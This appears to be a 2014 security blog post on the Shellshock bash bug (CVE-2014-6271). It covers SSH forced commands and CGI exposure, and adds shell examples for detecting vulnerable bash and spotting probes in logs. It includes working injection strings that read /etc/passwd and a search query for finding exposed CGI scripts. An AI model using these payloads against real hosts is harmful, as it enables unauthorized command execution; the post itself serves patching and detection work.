My bash story – CVE-2014-6271

CVE-2014-6271 hit the news yesterday, and if you're serious about security you have to be on top of everything.
After reading the oss-sec list, I first patched my system (so should you), and then I left a known vulnerable VM in my safe environment to play with. How does it work? Is it as bad as people are saying? Yes!

Take one scenario:
You're managing a network and do a lot of maintenance/report jobs via SSH and keys. Of course you have locked down the ability to get an interactive shell, with command="$SOMECMD",no-agent-forwarding,no-port-forwarding,no-pty,no-user-rc,no-X11-forwarding in your authorized_keys.

If $SOMECMD is a bash script, or the remote user's login shell is bash, you're out of luck. sshd exports whatever command the client asked for as SSH_ORIGINAL_COMMAND and runs the forced command through the login shell, so a vulnerable bash imports the attacker's string as a function definition, and executes what follows it, before $SOMECMD ever runs:

ssh -o 'RSAAuthentication yes' remoteuser@remotehost '() { ignored; }; cat /etc/passwd'

You can run any command with the same privileges as the remote user. I would say this classifies as privilege escalation, but you need a "valid" user/session to get this to work. So what else has been discussed? Well, one of my biggest concerns is CGI scripts which run some kind of bash code; this would definitely be a bad scenario. This would work remotely, and without a valid user...
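The forced-command scenario above, as an added example that is not part of the original post: a check of the local bash with the canonical Shellshock probe, a simulation of what sshd does with a command="..." key (export the client's string as SSH_ORIGINAL_COMMAND, run the forced command through the login shell with -c), and a hypothetical allow-list wrapper. The function names, the "report"/"backup" jobs and the attacker string are all constructed for the example.

```shell
#!/bin/sh
# Added example (not from the original post): how a Shellshock payload reaches
# bash through a forced SSH command, and how to check a local bash for the bug.

# Canonical Shellshock probe: a function definition in an environment variable
# with a trailing command. A vulnerable bash executes the trailing
# "echo vulnerable" while importing the variable; a patched bash only runs the
# -c command. Prints "vulnerable" or "patched"; "no-bash" if bash is missing.
bash_shellshock_status() {
    command -v bash >/dev/null 2>&1 || { echo no-bash; return; }
    _out=$(env x='() { :;}; echo vulnerable' bash -c 'echo probe' 2>/dev/null)
    case "$_out" in
        *vulnerable*) echo vulnerable ;;
        *)            echo patched ;;
    esac
}

# What sshd does for an authorized_keys entry with command="...": it exports
# the client's requested command as SSH_ORIGINAL_COMMAND and runs the forced
# command through the account's login shell with "-c". $1 is the string the
# client sent, $2 is the forced command. (Simulation: bash is invoked directly
# instead of by sshd, and the login shell is assumed to be bash.)
simulate_forced_command() {
    command -v bash >/dev/null 2>&1 || { echo no-bash; return; }
    SSH_ORIGINAL_COMMAND="$1" bash -c "$2" 2>/dev/null
}

# Hypothetical forced-command wrapper: only a fixed menu of jobs is allowed, so
# a client can never pass free-form shell through SSH_ORIGINAL_COMMAND.
# This does NOT protect a vulnerable bash: the payload fires while the login
# shell imports the environment, before this wrapper gets control. Patch bash
# (or give the account a non-bash login shell) as well.
safe_dispatch() {
    case "${SSH_ORIGINAL_COMMAND:-}" in
        report) echo "running report job" ;;
        backup) echo "running backup job" ;;
        *)      echo "rejected: ${SSH_ORIGINAL_COMMAND:-<empty>}" >&2; return 1 ;;
    esac
}

# Demonstration with a constructed attacker string.
payload='() { ignored; }; echo INJECTED'
echo "local bash: $(bash_shellshock_status)"
echo "forced command output (INJECTED would appear first on a vulnerable bash):"
simulate_forced_command "$payload" 'echo maintenance-job'
( export SSH_ORIGINAL_COMMAND="$payload"; safe_dispatch ) || true
```

On a patched bash the forced command prints only "maintenance-job"; on a vulnerable one "INJECTED" is printed before it, because bash runs the trailing command while importing SSH_ORIGINAL_COMMAND from the environment.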

Google search : filetype:sh inurl:cgi-bin;
About 1,230,000 results (0.38 seconds)

I haven't tested this yet, but this can be really bad. Maybe as bad as Heartbleed. Another concern is embedded systems: your router, your NAS, your TV... I guess we will see a lot of exploits in the near future. And Metasploit already has a module.

Apache mod_cgi Bash Environment Variable Code Injection

This module exploits a code injection in specially crafted environment variables in Bash, specifically targeting Apache mod_cgi scripts through the HTTP_USER_AGENT variable.

The good news! The VM I was testing on last night has automagically updated itself; it looks like Ubuntu has a job running every morning that updates critical packages without you knowing.
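The CGI scenario above, as an added example that is not part of the original post or of the Metasploit module: mod_cgi exports every request header as an HTTP_<NAME> environment variable, so a User-Agent lands in HTTP_USER_AGENT in the environment of whatever interpreter the script's shebang names. The block writes a minimal bash CGI script, runs it the way mod_cgi would with a probe in the User-Agent, and then greps constructed Apache access-log lines for the function-definition prefix. The script, the IP addresses, the log lines and the function names are all constructed for the example.

```shell
#!/bin/sh
# Added example (not from the original post): what a Shellshock probe against a
# bash CGI script looks like when executed and in the Apache access log.

# Constructed sample CGI script. Its shebang is bash, so a vulnerable bash
# would run the attacker's trailing command while importing HTTP_USER_AGENT,
# before the first echo executes.
write_cgi_script() {
    cat > "$1" <<'EOF'
#!/bin/bash
echo "Content-Type: text/plain"
echo
echo "hello from cgi"
EOF
    chmod +x "$1"
}

# Simulate mod_cgi: run the script with the request header in its environment.
# $1 is the script path, $2 the User-Agent the client sent.
run_cgi_with_user_agent() {
    HTTP_USER_AGENT="$2" "$1" 2>/dev/null
}

# Detection: the prefix "() {" has no business in a User-Agent, Referer,
# Cookie or query string. Reads log lines on stdin, prints the matching ones.
find_shellshock_probes() {
    grep -E '\(\) *[{]'
}

# Constructed Apache combined-format lines (not from a real server): one benign
# browser hit, a probe in the User-Agent, a probe in the Referer, one benign curl.
SAMPLE_LOG='10.0.0.5 - - [25/Sep/2014:06:29:40 +0200] "GET /cgi-bin/status.sh HTTP/1.1" 200 12 "-" "Mozilla/5.0 (X11; Linux x86_64)"
10.0.0.9 - - [25/Sep/2014:06:31:02 +0200] "GET /cgi-bin/status.sh HTTP/1.1" 200 12 "-" "() { :;}; /bin/ping -c 1 198.51.100.7"
10.0.0.9 - - [25/Sep/2014:06:31:05 +0200] "GET /cgi-bin/status.sh HTTP/1.1" 200 12 "() { ignored; }; cat /etc/passwd" "curl/7.35.0"
10.0.0.12 - - [25/Sep/2014:06:32:10 +0200] "GET /index.html HTTP/1.1" 200 4096 "-" "curl/7.35.0"'

# Number of sample lines carrying a probe.
count_shellshock_probes() {
    printf '%s\n' "$SAMPLE_LOG" | find_shellshock_probes | wc -l | tr -d ' '
}

tmp=$(mktemp)
write_cgi_script "$tmp"
echo "--- CGI output (on a vulnerable bash, INJECTED would appear first):"
run_cgi_with_user_agent "$tmp" '() { :;}; echo INJECTED' || true
rm -f "$tmp"
echo "--- probes found in sample log: $(count_shellshock_probes)"
printf '%s\n' "$SAMPLE_LOG" | find_shellshock_probes
```

The grep is deliberately loose: the same prefix can arrive in any header or in the query string, and a real hunt should also look for percent-encoded forms such as "%28%29%20%7B" in the request line, which a patched bash ignores but which still identify who was scanning you.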

2014-09-25 06:29:40 upgrade bash:amd64 4.3-7ubuntu1 4.3-7ubuntu1.1
2014-09-25 06:29:40 status half-configured bash:amd64 4.3-7ubuntu1
2014-09-25 06:29:40 status unpacked bash:amd64 4.3-7ubuntu1
2014-09-25 06:29:40 status half-installed bash:amd64 4.3-7ubuntu1
2014-09-25 06:29:41 status half-installed bash:amd64 4.3-7ubuntu1
2014-09-25 06:29:41 status unpacked bash:amd64 4.3-7ubuntu1.1
2014-09-25 06:29:41 status unpacked bash:amd64 4.3-7ubuntu1.1
2014-09-25 06:29:42 configure bash:amd64 4.3-7ubuntu1.1 <none>
2014-09-25 06:29:42 status unpacked bash:amd64 4.3-7ubuntu1.1
2014-09-25 06:29:42 status unpacked bash:amd64 4.3-7ubuntu1.1
2014-09-25 06:29:42 status unpacked bash:amd64 4.3-7ubuntu1.1
2014-09-25 06:29:42 status unpacked bash:amd64 4.3-7ubuntu1.1
2014-09-25 06:29:42 status unpacked bash:amd64 4.3-7ubuntu1.1
2014-09-25 06:29:42 status half-configured bash:amd64 4.3-7ubuntu1.1
2014-09-25 06:29:42 status installed bash:amd64 4.3-7ubuntu1.1

BTW, I just came across a cute way of checking your system for this vulnerability, that is, if you're running Splunk.
Splunk Blog – ShellShock

Picture "stolen" from Splunk blog...
